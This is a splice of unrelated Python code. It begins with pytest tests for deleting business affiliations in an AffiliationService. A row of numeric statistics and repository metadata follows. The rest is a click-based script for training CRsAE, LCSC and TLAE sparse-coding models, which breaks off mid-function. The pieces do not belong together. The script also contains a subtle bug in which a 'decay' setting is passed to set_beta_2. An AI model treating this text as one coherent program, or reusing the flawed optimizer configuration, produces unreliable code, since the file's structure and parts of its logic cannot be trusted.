def test_delete_affiliation_no_org(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without org."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=None, business_identifier=business_identifier)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_no_entity(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without entity."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=None)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_no_affiliation(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can not be deleted without affiliation."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service()
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
with pytest.raises(BusinessException) as exception:
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
assert exception.value.code == Error.DATA_NOT_FOUND.name
def test_delete_affiliation_implicit(session, auth_mock): # pylint:disable=unused-argument
"""Assert that an affiliation can be deleted."""
entity_service = factory_entity_service(TestEntityInfo.entity_lear_mock)
entity_dictionary = entity_service.as_dict()
business_identifier = entity_dictionary['businessIdentifier']
org_service = factory_org_service(org_type_info=TestOrgTypeInfo.implicit)
org_dictionary = org_service.as_dict()
org_id = org_dictionary['id']
affiliation = AffiliationService.create_affiliation(org_id,
business_identifier,
TestEntityInfo.entity_lear_mock['passCode'],
{})
AffiliationService.delete_affiliation(org_id=org_id, business_identifier=business_identifier)
found_affiliation = AffiliationModel.query.filter_by(id=affiliation.identifier).first()
assert found_affiliation is None
| 46.055375 | 114 | 0.719287 | 1,569 | 14,139 | 6.165711 | 0.103888 | 0.027393 | 0.029564 | 0.052098 | 0.836159 | 0.834815 | 0.820343 | 0.815278 | 0.809696 | 0.784474 | 0 | 0.004723 | 0.20638 | 14,139 | 306 | 115 | 46.205882 | 0.857321 | 0.153618 | 0 | 0.735751 | 0 | 0 | 0.035934 | 0.002278 | 0 | 0 | 0 | 0 | 0.119171 | 1 | 0.07772 | false | 0.088083 | 0.046632 | 0 | 0.124352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
c196677c499939e47219e88d19e2a79b5c27b325 | 54,065 | py | Python | keras/src/run_experiments/run_experiment.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 8 | 2020-09-27T09:04:07.000Z | 2021-10-06T15:23:06.000Z | keras/src/run_experiments/run_experiment.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 5 | 2020-07-27T14:31:05.000Z | 2022-02-10T02:17:50.000Z | keras/src/run_experiments/run_experiment.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 1 | 2021-02-22T10:56:26.000Z | 2021-02-22T10:56:26.000Z | """
Copyright (c) 2020 Bahareh Tolooshams
functions to run experiment with CRsAE.
:author: Bahareh Tolooshams
"""
import os
# set this to the GPU name/number you want to use
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import warnings
warnings.filterwarnings("ignore")
import click
import yaml
import h5py
import numpy as np
import sys
import itertools
import time
from time import gmtime, strftime
from keras.datasets import mnist
from keras.utils import np_utils
sys.path.append("..")
PATH = sys.path[-1]
from src.models.CRsAE import *
from src.models.LCSC import *
from src.models.TLAE import *
from src.prints.parameters import *
from src.plotter.plot_experiment_results import *
from src.run_experiments.extract_results_helpers import *
@click.group(chain=True)
def run_experiment():
pass
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def real(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# build model knowing noiseSTD
noiseSTD = 0.01
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_init = np.load("{}/experiments/{}/data/H_init.npy".format(PATH, folder_name))
crsae.set_H(H_init)
################################################
# get initial H
H_initial = crsae.get_H()
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
g_ch = hf.get("{}".format(config_d["ch"]))
y_train = np.array(g_ch.get("y_train"))
y_test = np.array(g_ch.get("y_test"))
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train, folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test)
y_test_hat = crsae.denoise(y_test)
y_test_hat_separate = crsae.separate(y_test)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_initial)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def real_series(folder_name):
# load model parameters
print("load model parameters.")
file = open("../experiments/{}/config/config_model.yml".format(folder_name), "rb")
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open("../experiments/{}/config/config_data.yml".format(folder_name), "rb")
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("../experiments/{}/data/data.h5".format(folder_name), "r")
g_ch = hf.get("{}".format(config_d["ch"]))
y_train = np.array(g_ch.get("y_train"))
y_test = np.array(g_ch.get("y_test"))
y_series = np.array(g_ch.get("y_series"))
length_of_data = np.array(g_ch.get("length_of_data"))
noiseSTD = np.array(g_ch.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_init = np.load("../experiments/{}/data/H_init.npy".format(folder_name))
crsae.set_H(H_init)
################################################
# build model for series prediction
# create CRsAE object
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae_series = CRsAE_1d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae_series = CRsAE_1d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae_series = CRsAE_2d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae_series = CRsAE_2d(
length_of_data,
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
# build model knowing noiseSTD
crsae_series.build_model(noiseSTD)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train, folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
if (config_d["num_test"]) != 0:
z_test_hat = crsae.encode(y_test)
y_test_hat = crsae.denoise(y_test)
y_test_hat_separate = crsae.separate(y_test)
else:
z_test_hat = crsae.encode(y_train)
y_test_hat = crsae.denoise(y_train)
y_test_hat_separate = crsae.separate(y_train)
H_learned = crsae.get_H()
lambda_learned = crsae.get_lambda()
crsae_series.set_H(H_learned)
crsae_series.set_lambda(lambda_learned)
z_series_hat = crsae_series.encode(y_series)
y_series_hat = crsae_series.denoise(y_series)
y_series_hat_separate = crsae_series.separate(y_series)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"../experiments/{}/results/results_prediction_{}.h5".format(folder_name, time),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"z_series_hat", data=z_series_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_series_hat", data=y_series_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset(
"y_series_hat_separate",
data=y_series_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
print(H_noisestd)
flag = 1
while flag:
crsae.set_H(H_true, H_noisestd)
dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
if np.min(dist_true_learned) >= 0.4:
if np.max(dist_true_learned) <= 0.5:
flag = 0
# # this is temp
# H_init = np.load(
# "{}/experiments/{}/data/H_init.npy".format(PATH, folder_name)
# )
# crsae.set_H(H_init)
dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
print("initial distance err:", dist_true_learned)
################################################
z_test = np.array(hf.get("z_test"))
l1_norm_z_test = np.mean(np.sum(np.sum(np.abs(z_test), axis=2), axis=1), axis=0)
print("l1_norm from true code:", l1_norm_z_test)
lambda_estimate = (
(config_m["input_dim"] - config_m["dictionary_dim"] + 1) * config_m["num_conv"]
) / l1_norm_z_test
print("lambda estimate from true code:", lambda_estimate)
y_test = np.array(hf.get("y_test"))
z_test_from_FISTA = crsae.encode(y_test)
l1_norm_z_test_from_FISTA = np.mean(
np.sum(np.sum(np.abs(z_test_from_FISTA), axis=2), axis=1), axis=0
)
print("l1_norm from code through FISTA:", l1_norm_z_test_from_FISTA)
lambda_estimate_from_FISTA = (
(config_m["input_dim"] - config_m["dictionary_dim"] + 1) * config_m["num_conv"]
) / l1_norm_z_test_from_FISTA
print("lambda estimate from code through FISTA:", lambda_estimate_from_FISTA)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
print("noiseSTD before training:", crsae.get_noiseSTD())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
print("noiseSTD after training:", crsae.get_noiseSTD())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test_noisy)
y_test_hat = crsae.denoise(y_test_noisy)
y_test_hat_separate = crsae.separate(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("H_init", data=H_init)
g_ch.create_dataset("lambda_init", data=lambda_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def lcsc_simulated(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
for p in range(10):
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
lcsc = LCSC_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
)
else:
print("ERROR: 2D version of LCSC is not implemented.")
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
lcsc.trainer.set_num_epochs(config_m["num_epochs"])
lcsc.trainer.set_batch_size(config_m["batch_size"])
lcsc.trainer.set_verbose(config_m["verbose"])
lcsc.trainer.set_val_split(config_m["val_split"])
lcsc.trainer.set_loss(config_m["loss"])
lcsc.trainer.set_close(config_m["close"])
lcsc.trainer.set_augment(config_m["augment"])
# optimizer
lcsc.trainer.set_optimizer(config_m["optimizer"])
lcsc.trainer.optimizer.set_lr(config_m["lr"])
lcsc.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# add callbacks
print("add callbacks.")
lcsc.trainer.add_best_val_loss_callback(config_m["loss_type"])
lcsc.trainer.add_all_epochs_callback(config_m["loss_type"])
lcsc.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
lcsc.trainer.add_cyclic_lr_callback(
config_m["base_lr"], config_m["max_lr"], config_m["step_size"]
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model
lcsc.build_model()
# initialize filter
if lcsc.trainer.get_close():
We_true = np.load(
"{}/experiments/{}/data/H_true.npy".format(PATH, folder_name)
)
weights_noisestd = 0.5 * np.std(np.squeeze(We_true), axis=0)
print(weights_noisestd)
We_noisy = np.copy(We_true)
for n in range(config_m["num_conv"]):
We_noisy[:, :, n] += weights_noisestd[n] * np.random.randn(
lcsc.get_dictionary_dim(), 1
)
Wd_noisy = np.expand_dims(np.flip(np.squeeze(We_noisy), axis=0), axis=2)
d_noisy = np.expand_dims(np.flip(np.squeeze(We_noisy), axis=0), axis=2)
We_noisy /= config_m["L"]
lcsc.set_weights(Wd_noisy, We_noisy, d_noisy)
################################################
if config_m["lambda_trainable"]:
lcsc.set_lambda(np.zeros(config_m["num_conv"]) + (1 / config_m["L"]))
else:
donoho_estimate = noiseSTD * np.sqrt(
2
* np.log(
config_m["num_conv"]
* (config_m["input_dim"] - config_m["dictionary_dim"] + 1)
)
)
lcsc.set_lambda(np.zeros(config_m["num_conv"]) + donoho_estimate)
################################################
# get lambda
print("lambda (regulariztion parameter) before training:", lcsc.get_lambda())
################################################
# get initial weights
Wd_initial = lcsc.get_Wd()
We_initial = lcsc.get_We()
d_initial = lcsc.get_d()
lambda_initial = lcsc.get_lambda()
################################################
# train
time = lcsc.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda (regulariztion parameter) after training:", lcsc.get_lambda())
################################################
# predict
print("do prediciton.")
z_test_hat = lcsc.encode(y_test_noisy)
y_test_hat = lcsc.denoise(y_test_noisy)
y_test_hat_separate = lcsc.separate(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/LCSC_results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("Wd_init", data=Wd_initial)
g_ch.create_dataset("We_init", data=We_initial)
g_ch.create_dataset("d_init", data=d_initial)
g_ch.create_dataset("lambda_init", data=lambda_initial)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def tlae_simulated(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = TLAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = TLAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = TLAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
